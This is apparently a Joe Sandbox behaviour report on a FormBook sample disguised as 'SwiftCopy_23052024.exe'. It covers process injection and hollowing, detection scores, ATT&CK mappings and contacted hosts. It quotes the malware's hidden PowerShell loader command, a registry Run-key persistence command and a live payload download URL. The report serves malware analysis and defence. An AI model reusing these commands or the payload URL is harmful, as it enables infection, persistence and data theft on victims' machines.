Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtTerminateProcess: Direct from: 0x77762D5C	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: NULL target: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\wlanext.exe

Thread APC queued: target process: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$lommeregnerens178=get-content 'c:\users\user\appdata\roaming\fertiliseringer\forbrug\venstrehaandsarbejdet.uns';$industrivirksomhederne=$lommeregnerens178.substring(7349,3);.$industrivirksomhederne($lommeregnerens178)"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%jordbesiddere% -windowstyle minimized $udslettelser=(get-itemproperty -path 'hkcu:\oplukkelig\').bractlets52;%jordbesiddere% ($udslettelser)"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$lommeregnerens178=get-content 'c:\users\user\appdata\roaming\fertiliseringer\forbrug\venstrehaandsarbejdet.uns';$industrivirksomhederne=$lommeregnerens178.substring(7349,3);.$industrivirksomhederne($lommeregnerens178)"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%jordbesiddere% -windowstyle minimized $udslettelser=(get-itemproperty -path 'hkcu:\oplukkelig\').bractlets52;%jordbesiddere% ($udslettelser)"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

0_2_00403248

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	411 Process Injection	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	411 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
SwiftCopy_23052024.exe	26%	ReversingLabs
SwiftCopy_23052024.exe	27%	Virustotal	Browse
SwiftCopy_23052024.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	27%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
innovativebuildingsolutions.in	14%	Virustotal		Browse
www.innovativebuildingsolutions.in	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.ftp.ftp://ftp.gopher.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Virustotal		Browse
https://www.innovativebuildingsolutions.in/	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
https://www.innovativebuildingsolutions.in/	12%	Virustotal		Browse
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.	0%	Avira URL Cloud	safe
http://crl.microsoft3m	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
innovativebuildingsolutions.in	103.21.58.98	true	false	14%, Virustotal, Browse	unknown
www.innovativebuildingsolutions.in	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	SwiftCopy_23052024.exe, SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.innovativebuildingsolutions.in/	Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2191833725.00000000054FB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Tabsgivende.exe, 00000012.00000001.2023172133.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ftp.ftp://ftp.gopher.	Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.innovativebuildingsolutions.in/wp-content/uploads/gravity_forms/h/d/b/g/iAaONygKDDyVp46.	Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2374837467.0000000021E40000.00000004.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361654109.000000000664A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft3m	powershell.exe, 00000002.00000002.2194788863.0000000006D61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	SwiftCopy_23052024.exe, 00000000.00000000.1186909276.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SwiftCopy_23052024.exe, 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Tabsgivende.exe, 00000012.00000000.2022515665.000000000040A000.00000008.00000001.01000000.00000008.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2188238405.0000000004491000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2188238405.00000000045E6000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.21.58.98	innovativebuildingsolutions.in	United Arab Emirates		394695	PUBLIC-DOMAIN-REGISTRYUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446510
Start date and time:	2024-05-23 15:19:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SwiftCopy_23052024.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/22@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 68% Number of executed functions: 82 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4324 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

